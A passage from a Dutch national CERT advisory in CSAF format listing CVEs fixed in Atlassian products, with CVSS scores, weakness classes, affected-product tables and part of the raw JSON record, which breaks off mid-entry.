vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2024-45801

Multiple vulnerabilities across Oracle products and DOMPurify allow for data compromise, denial of service, and XSS attacks, with CVSS scores ranging from 6.3 to 7.3.

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-1333 - Inefficient Regular Expression Complexity

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-12383

Oracle Database Server versions 23.4.0-23.26.0 have a vulnerability in the Fleet Patching and Provisioning component, while Eclipse Jersey versions 2.45, 3.0.16, and 3.1.9 may ignore critical SSL configurations due to a race condition.

8.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-15284

The `qs` module's `arrayLimit` option is vulnerable to denial-of-service attacks due to its failure to enforce limits for bracket notation, allowing attackers to exploit memory exhaustion.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-20 - Improper Input Validation

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-27152

Recent vulnerabilities in axios, pgadmin4, and HPE software expose systems to SSRF and credential leakage, particularly through the use of absolute URLs, necessitating updates to mitigate these risks.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-41249

Multiple vulnerabilities have been identified in Oracle Financial Services and Retail products, as well as the Spring Framework, allowing unauthorized access to sensitive data and potentially leading to information disclosure.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-285 - Improper Authorization

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-48976

Multiple denial-of-service vulnerabilities have been identified in Oracle Application Testing Suite, Oracle Agile PLM, Apache Commons FileUpload, and HPE IceWall Identity Manager, with CVSS scores of 7.5 for some products.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-48989

Recent updates for Apache Tomcat versions 9, 10, and 11 address the 'MadeYouReset' DoS vulnerability and other issues, with specific versions being susceptible to Denial of Service attacks from malformed client requests.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-404 - Improper Resource Shutdown or Release

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-49146

Multiple vulnerabilities in the Oracle Enterprise Data Quality product and PostgreSQL JDBC Driver allow unauthorized access and insecure authentication, with CVSS scores indicating significant risk.

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CWE-287 - Improper Authentication

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-52434

Apache Tomcat versions 9.0.0.M1 to 9.0.106 have multiple vulnerabilities, including a race condition affecting HTTP/2 connections and denial of service flaws, alongside issues in Oracle Graph Server and HPE Unified OSS Console.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-52999

Multiple vulnerabilities affect Oracle Communications Unified Assurance and Oracle Business Intelligence Enterprise Edition, allowing denial of service attacks, while older jackson-core versions are prone to StackoverflowErrors when parsing nested data.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-121 - Stack-based Buffer Overflow

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-53689

Apache Jackrabbit versions prior to 2.23.2 are vulnerable to blind XXE attacks due to an unsecured document build for loading privileges.

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-611 - Improper Restriction of XML External Entity Reference

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-54988

Apache Tika versions 1.13 to 3.2.1 have a critical XXE vulnerability, while Oracle PeopleSoft's OpenSearch component in versions 8.60 to 8.62 is also affected by an easily exploitable vulnerability.

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-611 - Improper Restriction of XML External Entity Reference

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-55163

Recent updates to Netty and Oracle Communications products address critical vulnerabilities, including the 'MadeYouReset' attack in HTTP/2, which can lead to denial of service and resource exhaustion.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-55752

Apache Tomcat versions 1.0.0-M1 to 11.0.10 are vulnerable to a directory traversal issue that may allow remote code execution if HTTP PUT requests are enabled, alongside other security vulnerabilities in HPE UOCAM.

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-23 - Relative Path Traversal

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-64775

Apache Struts versions 2.0.0 to 6.7.0 and 7.0.0 to 7.0.3 have a Denial of Service vulnerability due to file leak in multipart request processing, affecting NetApp products.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-459 - Incomplete Cleanup

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-66516

Apache Tika has multiple critical XML External Entity (XXE) injection vulnerabilities, particularly affecting PDF parsing, allowing remote attackers to exploit crafted documents for sensitive data disclosure and remote code execution.

10.0 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE-611 - Improper Restriction of XML External Entity Reference

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-9287

The document outlines a vulnerability in the `create-hash` package due to inadequate input type checks, leading to potential hash state manipulation and security risks, particularly in the `cipher-base` npm package versions up to 1.0.4.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE-20 - Improper Input Validation

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2025-9288

The document outlines a vulnerability in `sha.js` versions up to 2.4.11 due to insufficient input type checks, leading to potential denial of service and private key extraction risks.

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE-20 - Improper Input Validation

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

CVE-2026-21569

A high severity XXE vulnerability in Crowd Data Center and Server version 7.1.0 has a CVSS score of 7.9, allowing authenticated attackers to access sensitive content without user interaction.

Affected products

Known affected 7 products

Product	Identifier	Version	Remediation
vers:unknown/* Atlassian / Bamboo		vers:unknown/*
vers:unknown/* Atlassian / Bitbucket		vers:unknown/*
vers:unknown/* Atlassian / Confluence		vers:unknown/*
vers:unknown/* Atlassian / Crowd Server		vers:unknown/*
vers:unknown/* Atlassian / Crucible		vers:unknown/*
vers:unknown/* Atlassian / Fisheye		vers:unknown/*
vers:unknown/* Atlassian / Jira		vers:unknown/*

References

26 references

URL	Category
https://confluence.atlassian.com/security/securit…	external
https://vulnerabilities.ncsc.nl/csaf/v2/2021/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-…	self
https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-…	self

JSON

To clipboard

{
  "document": {
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE"
      }
    },
    "lang": "nl",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n    NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n    NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n    This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
      },
      {
        "category": "description",
        "text": "Atlassian heeft kwetsbaarheden verholpen in verschillende producten, welke gebruik maken van Oracle middle-ware producten zoals de Oracle Utilities Application Framework, WebLogic Server, Data Integrator en Business Intelligence Enterprise Edition.",
        "title": "Feiten"
      },
      {
        "category": "description",
        "text": "Deze kwetsbaarheden stellen ongeauthenticeerde aanvallers in staat om een denial of service (DoS) of om zich toegang te verschaffen tot gevoelige gegevens.\nEen reeks kwetsbaarheden is afkomstig van diverse Oracle-middleware software, welke in Atlassian-producten is verwerkt. Deze kwetsbaarheden zijn verholpen in de Critical Patch Update van januari 2026 van Oracle en verwerkt in de getroffen Atlassian producten.",
        "title": "Interpretaties"
      },
      {
        "category": "description",
        "text": "Atlassian heeft updates uitgebracht om de kwetsbaarheden te verhelpen. Zie bijgevoegde referenties voor meer informatie.",
        "title": "Oplossingen"
      },
      {
        "category": "general",
        "text": "medium",
        "title": "Kans"
      },
      {
        "category": "general",
        "text": "high",
        "title": "Schade"
      },
      {
        "category": "general",
        "text": "Improper Input Validation",
        "title": "CWE-20"
      },
      {
        "category": "general",
        "text": "Relative Path Traversal",
        "title": "CWE-23"
      },
      {
        "category": "general",
        "text": "Stack-based Buffer Overflow",
        "title": "CWE-121"
      },
      {
        "category": "general",
        "text": "Improper Authorization",
        "title": "CWE-285"
      },
      {
        "category": "general",
        "text": "Improper Authentication",
        "title": "CWE-287"
      },
      {
        "category": "general",
        "text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
        "title": "CWE-362"
      },
      {
        "category": "general",
        "text": "Uncontrolled Resource Consumption",
        "title": "CWE-400"
      },
      {
        "category": "general",
        "text": "Improper Resource Shutdown or Release",
        "title": "CWE-404"
      },
      {
        "category": "general",
        "text": "Incomplete Cleanup",
        "title": "CWE-459"
      },
      {
        "category": "general",
        "text": "Improper Restriction of XML External Entity Reference",
        "title": "CWE-611"
      },
      {
        "category": "general",
        "text": "Incorrect Comparison",
        "title": "CWE-697"
      },
      {
        "category": "general",
        "text": "Allocation of Resources Without Limits or Throttling",
        "title": "CWE-770"
      },
      {
        "category": "general",
        "text": "Out-of-bounds Write",
        "title": "CWE-787"
      },
      {
        "category": "general",
        "text": "Incorrect Authorization",
        "title": "CWE-863"
      },
      {
        "category": "general",
        "text": "Server-Side Request Forgery (SSRF)",
        "title": "CWE-918"
      },
      {
        "category": "general",
        "text": "CWE-937",
        "title": "CWE-937"
      },
      {
        "category": "general",
        "text": "CWE-1035",
        "title": "CWE-1035"
      },
      {
        "category": "general",
        "text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
        "title": "CWE-1321"
      },
      {
        "category": "general",
        "text": "Inefficient Regular Expression Complexity",
        "title": "CWE-1333"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "cert@ncsc.nl",
      "name": "Nationaal Cyber Security Centrum",
      "namespace": "https://www.ncsc.nl/"
    },
    "references": [
      {
        "category": "external",
        "summary": "Reference",
        "url": "https://confluence.atlassian.com/security/security-bulletin-january-20-2026-1712324819.html"
      }
    ],
    "title": "Kwetsbaarheden verholpen in Atlassian producten",
    "tracking": {
      "current_release_date": "2026-01-22T09:03:42.667958Z",
      "generator": {
        "date": "2025-08-04T16:30:00Z",
        "engine": {
          "name": "V.A.",
          "version": "1.3"
        }
      },
      "id": "NCSC-2026-0034",
      "initial_release_date": "2026-01-22T09:03:42.667958Z",
      "revision_history": [
        {
          "date": "2026-01-22T09:03:42.667958Z",
          "number": "1.0.0",
          "summary": "Initiele versie"
        }
      ],
      "status": "final",
      "version": "1.0.0"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-1"
                }
              }
            ],
            "category": "product_name",
            "name": "Bamboo"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-2"
                }
              }
            ],
            "category": "product_name",
            "name": "Bitbucket"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-3"
                }
              }
            ],
            "category": "product_name",
            "name": "Confluence"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-4"
                }
              }
            ],
            "category": "product_name",
            "name": "Crowd Server"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-5"
                }
              }
            ],
            "category": "product_name",
            "name": "Crucible"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-6"
                }
              }
            ],
            "category": "product_name",
            "name": "Fisheye"
          },
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "vers:unknown/*",
                "product": {
                  "name": "vers:unknown/*",
                  "product_id": "CSAFPID-7"
                }
              }
            ],
            "category": "product_name",
            "name": "Jira"
          }
        ],
        "category": "vendor",
        "name": "Atlassian"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2021-3807",
      "cwe": {
        "id": "CWE-400",
        "name": "Uncontrolled Resource Consumption"
      },
      "notes": [
        {
          "category": "other",
          "text": "Uncontrolled Resource Consumption",
          "title": "CWE-400"
        },
        {
          "category": "other",
          "text": "Inefficient Regular Expression Complexity",
          "title": "CWE-1333"
        },
        {
          "category": "other",
          "text": "Incorrect Comparison",
          "title": "CWE-697"
        },
        {
          "category": "description",
          "text": "Recent updates address critical security vulnerabilities across various software, including Ansible, Node.js, and Golang packages, with significant fixes for ReDoS and sensitive data exposure issues.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2021-3807 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2021/cve-2021-3807.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2021-3807"
    },
    {
      "cve": "CVE-2022-25883",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "notes": [
        {
          "category": "other",
          "text": "Inefficient Regular Expression Complexity",
          "title": "CWE-1333"
        },
        {
          "category": "description",
          "text": "Multiple versions of the semver package are vulnerable to Regular Expression Denial of Service (ReDoS) through the new Range function, prompting updates in various products to mitigate this risk.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2022-25883 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-2022-25883.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2022-25883"
    },
    {
      "cve": "CVE-2022-45693",
      "cwe": {
        "id": "CWE-787",
        "name": "Out-of-bounds Write"
      },
      "notes": [
        {
          "category": "other",
          "text": "Out-of-bounds Write",
          "title": "CWE-787"
        },
        {
          "category": "description",
          "text": "Multiple Oracle products, including Utilities Application Framework, WebLogic Server, Data Integrator, and Business Intelligence Enterprise Edition, have vulnerabilities allowing unauthenticated denial of service attacks, all with a CVSS score of 7.5.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2022-45693 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-2022-45693.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2022-45693"
    },
    {
      "cve": "CVE-2024-21538",
      "cwe": {
        "id": "CWE-1333",
        "name": "Inefficient Regular Expression Complexity"
      },
      "notes": [
        {
          "category": "other",
          "text": "Inefficient Regular Expression Complexity",
          "title": "CWE-1333"
        },
        {
          "category": "description",
          "text": "Recent updates across various AWS packages, Node.js versions, and Python libraries address security vulnerabilities, enhance functionality, and improve performance, while several vulnerability reports highlight critical issues in Oracle Communications, HPE Unified OSS Console, and the cross-spawn package.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2024-21538 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-21538.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2024-21538"
    },
    {
      "cve": "CVE-2024-38286",
      "cwe": {
        "id": "CWE-400",
        "name": "Uncontrolled Resource Consumption"
      },
      "notes": [
        {
          "category": "other",
          "text": "Uncontrolled Resource Consumption",
          "title": "CWE-400"
        },
        {
          "category": "other",
          "text": "Allocation of Resources Without Limits or Throttling",
          "title": "CWE-770"
        },
        {
          "category": "description",
          "text": "Apache Tomcat versions 11.0.0-M1 to 11.0.0-M20, 10.1.0-M1 to 10.1.24, and 9.0.13 to 9.0.89 are vulnerable to OutOfMemoryError and Denial of Service due to improper TLS handshake handling.",
